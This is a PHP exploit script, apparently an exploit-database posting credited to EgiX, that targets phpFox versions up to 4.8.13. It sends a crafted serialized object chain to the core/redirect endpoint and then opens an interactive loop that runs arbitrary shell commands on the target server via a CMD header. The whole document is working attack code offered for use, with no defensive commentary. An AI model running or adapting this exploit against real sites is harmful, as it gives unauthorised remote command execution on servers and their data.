phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit

1. <?php
2.  
3.  
4. set_time_limit(0);
5. error_reporting(E_ERROR);
6.  
7. if (!extension_loaded("curl")) die("[+] cURL extension required!\n");
8.  
9. print "+------------------------------------------------------------------+\n";
10. print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";
11. print "+------------------------------------------------------------------+\n";
12.  
13. if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");
14.  
15. function encode($string)
16. {
17.         $string = addslashes(gzcompress($string, 9));
18.         return urlencode(strtr(base64_encode($string), '+/=', '-_,'));
19. }
20.  
21. class Phpfox_Request
22. {
23.     private $_sName = "EgiX";
24.     private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";
25. }
26.  
27. class Core_Objectify
28. {
29.     private $__toString;
30.    
31.     function __construct($callback)
32.     {
33.         $this->__toString = $callback;
34.     }
35. }
36.  
37. print "\n[+] Launching shell on {$argv[1]}\n";
38.  
39. $popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));
40. $popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);
41.  
42. $ch = curl_init();
43.  
44. curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");
45. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
46. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
47. curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));
48.  
49. while(1)
50. {
51.     print "\nphpFox-shell# ";
52.     if (($cmd = trim(fgets(STDIN))) == "exit") break;
53.     curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
54.     preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
55. }
56.